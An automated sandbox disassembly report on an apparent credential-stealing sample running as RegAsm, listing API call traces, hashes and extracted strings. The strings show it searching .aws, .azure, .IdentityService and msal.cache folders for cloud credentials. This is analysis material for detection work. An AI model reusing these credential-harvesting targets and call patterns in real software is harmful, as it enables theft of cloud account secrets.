                                                                                                                                                                                                                                        • String ID: At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs).
                                                                                                                                                                                                                                        • API String ID: 710835760-1224611842
                                                                                                                                                                                                                                        • Opcode ID: 4b52ff8d1b4edfea4f766211d09d292b0e16e17e016467cf2f504a4323e89b8a
                                                                                                                                                                                                                                        • Instruction ID: f498ca94b0cf780e3660f044cf5a8bded02fdd4dda412cde648ac572d59e650e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b52ff8d1b4edfea4f766211d09d292b0e16e17e016467cf2f504a4323e89b8a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD11E639748220AB8710BEAF9CD3AC9B755AF84704B984067FD18A3282C57D5C4042B9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00417D11
                                                                                                                                                                                                                                          • Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00417D37
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,\.azure\), ref: 00417D54
                                                                                                                                                                                                                                          • Part of subcall function 00417800: wsprintfA.USER32 ref: 00417838
                                                                                                                                                                                                                                          • Part of subcall function 00417800: FindFirstFileA.KERNEL32(?,?), ref: 0041784F
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00417D93
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00417DBF
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,\.aws\), ref: 00417DDC
                                                                                                                                                                                                                                          • Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
                                                                                                                                                                                                                                          • Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
                                                                                                                                                                                                                                          • Part of subcall function 00417800: wsprintfA.USER32 ref: 004178DB
                                                                                                                                                                                                                                          • Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
                                                                                                                                                                                                                                          • Part of subcall function 00417800: wsprintfA.USER32 ref: 00417907
                                                                                                                                                                                                                                          • Part of subcall function 00417800: PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,0145F8A0), ref: 00417963
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,00428720), ref: 00417975
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 00417983
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,00428724), ref: 00417995
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 004179A9
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00417E1B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00417E47
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00417E64
                                                                                                                                                                                                                                          • Part of subcall function 00417800: wsprintfA.USER32 ref: 00417926
                                                                                                                                                                                                                                          • Part of subcall function 00417800: FindNextFileA.KERNEL32(000000FF,?), ref: 00417A7A
                                                                                                                                                                                                                                          • Part of subcall function 00417800: FindClose.KERNEL32(000000FF), ref: 00417A8C
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00417EA3
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                        • API String ID: 515946987-974132213
                                                                                                                                                                                                                                        • Opcode ID: da2b9637284faa4cf485b5091821e05eb1918fa99dd6be4bbb53a7ca8194cac4
                                                                                                                                                                                                                                        • Instruction ID: 1b53bb84b6d4d4d6c781053bd63c720a49e678cd70851be9322f010e7c87751d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da2b9637284faa4cf485b5091821e05eb1918fa99dd6be4bbb53a7ca8194cac4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3051F571900219ABCB14EBA0CC46FED7778AB1C704F64466EBA54631C2EF7C5B48CB65
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
                                                                                                                                                                                                                                        • API String ID: 0-3330941169
                                                                                                                                                                                                                                        • Opcode ID: 06ec2245c182b71dd0338a083831943c36c66227ef99c9f317ba96431a05c9f4
                                                                                                                                                                                                                                        • Instruction ID: bb886f2d335a5ae5b4083a48bf2ffda903933885ad30a8a6487159e44848257d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06ec2245c182b71dd0338a083831943c36c66227ef99c9f317ba96431a05c9f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB7147BAB002115BDB00DE19ED0199F77D5AFC5212F4C0879F943C7AA1FB21E94AC7A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
                                                                                                                                                                                                                                        • API String ID: 0-1070437968
                                                                                                                                                                                                                                        • Opcode ID: 5bdb58b559aa8f1f42c5f8a2e5e845115a737a62d4eb5bfcb2cf199885f99560
                                                                                                                                                                                                                                        • Instruction ID: 988d53940e36707a4f444b7fb31c41204e2e0a728f5b472ada804d39d9c5f951
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bdb58b559aa8f1f42c5f8a2e5e845115a737a62d4eb5bfcb2cf199885f99560
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4502F276A003419BE711DF24FD84B5B77E4BF94358F084528E8CA97382EB71E504CBAA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,block,00000000,?,0041826A), ref: 004128A8
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004128B3
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 004128CA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                        • String ID: block
                                                                                                                                                                                                                                        • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                        • Opcode ID: 3b485f1632f083769998979d87b02b748d3d8af068dba69865fe3c31359cfa10
                                                                                                                                                                                                                                        • Instruction ID: ae6e9dac41f5a43a3b2df2dea02a57a44f9796bfde1c63c592e4e2a6fe63bb36
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b485f1632f083769998979d87b02b748d3d8af068dba69865fe3c31359cfa10
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F141E6B1B50342ABDB509F799D04ADB7BA9BF05B04F60062FF502D3684EABC94909B58
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
                                                                                                                                                                                                                                        • API String ID: 0-3900766660
                                                                                                                                                                                                                                        • Opcode ID: 533ea13b66646aefc236f25938addd87bf0728fbf817c6ae374d1fbd1efcd5fc
                                                                                                                                                                                                                                        • Instruction ID: d607c8b219800d61ee318702014d025baa12c13c0037cfd9abde21d682f63397
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 533ea13b66646aefc236f25938addd87bf0728fbf817c6ae374d1fbd1efcd5fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FE114B6A047419BE710CF25E840B9B7BE4BF84755F1C452CE8CA9B381EB35E905C7A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00413AB3
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00413AC5
                                                                                                                                                                                                                                          • Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00413AF1
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,01461D70), ref: 00413B10
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00413B24
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,01461DA0), ref: 00413B38
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7
                                                                                                                                                                                                                                          • Part of subcall function 0040CF50: StrStrA.SHLWAPI(00000000,01462058,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
                                                                                                                                                                                                                                          • Part of subcall function 0040CF50: memcmp.MSVCRT ref: 0040CFF9
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9
                                                                                                                                                                                                                                          • Part of subcall function 004119B0: GlobalAlloc.KERNEL32(00000000,00413BC9,00000000,?,?,00413BC9,?,?), ref: 004119BB
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,014630B0), ref: 00413BD5
                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00413CAA
                                                                                                                                                                                                                                          • Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
                                                                                                                                                                                                                                          • Part of subcall function 00406F10: LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
                                                                                                                                                                                                                                          • Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
                                                                                                                                                                                                                                          • Part of subcall function 00406F10: LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C
                                                                                                                                                                                                                                          • Part of subcall function 004070D0: memcmp.MSVCRT ref: 0040710B
                                                                                                                                                                                                                                          • Part of subcall function 004070D0: memset.MSVCRT ref: 00407139
                                                                                                                                                                                                                                          • Part of subcall function 004070D0: LocalAlloc.KERNEL32(00000040,?), ref: 00407170
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00413C4E
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00428367,?,?,?,?,000003E8), ref: 00413C6B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00413C86
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,004286E0), ref: 00413C92
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                        • String ID: tA$tA
                                                                                                                                                                                                                                        • API String ID: 4228189460-660347137
                                                                                                                                                                                                                                        • Opcode ID: a686527ce75510f47c60ae33d292261ed302ce260e08debc89d5b7b65b7bb98b
                                                                                                                                                                                                                                        • Instruction ID: dee6d321855fcd0dcb4b30ed1074f5a9a8d64092eff38df03ecb134e2f941785
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a686527ce75510f47c60ae33d292261ed302ce260e08debc89d5b7b65b7bb98b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C71BBB5D00209ABCB10EFA1CC85EEE7779AF58304F10455EF615B3181EB789B48CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
                                                                                                                                                                                                                                        • API String ID: 0-1477268580
                                                                                                                                                                                                                                        • Opcode ID: edbd8dfee7b654ac7c80ee5ef2c68bdad1e182f9d4404e81356d08b38b6ff16d
                                                                                                                                                                                                                                        • Instruction ID: d0e6c8e892cbb9ea3bf6a5b011c14d21b62a5eb1c77a94dbbb166001d7f58c2e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: edbd8dfee7b654ac7c80ee5ef2c68bdad1e182f9d4404e81356d08b38b6ff16d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A51DFB56043019FD710DF28EC40A56B7A4FF84319F08592DE9968B691EB71E8158BA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409A72
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00409A79
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409BBF
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C8C), ref: 00409BCE
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409BE1
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C90), ref: 00409BF0
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409C03
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C94), ref: 00409C12
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409C25
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C98), ref: 00409C34
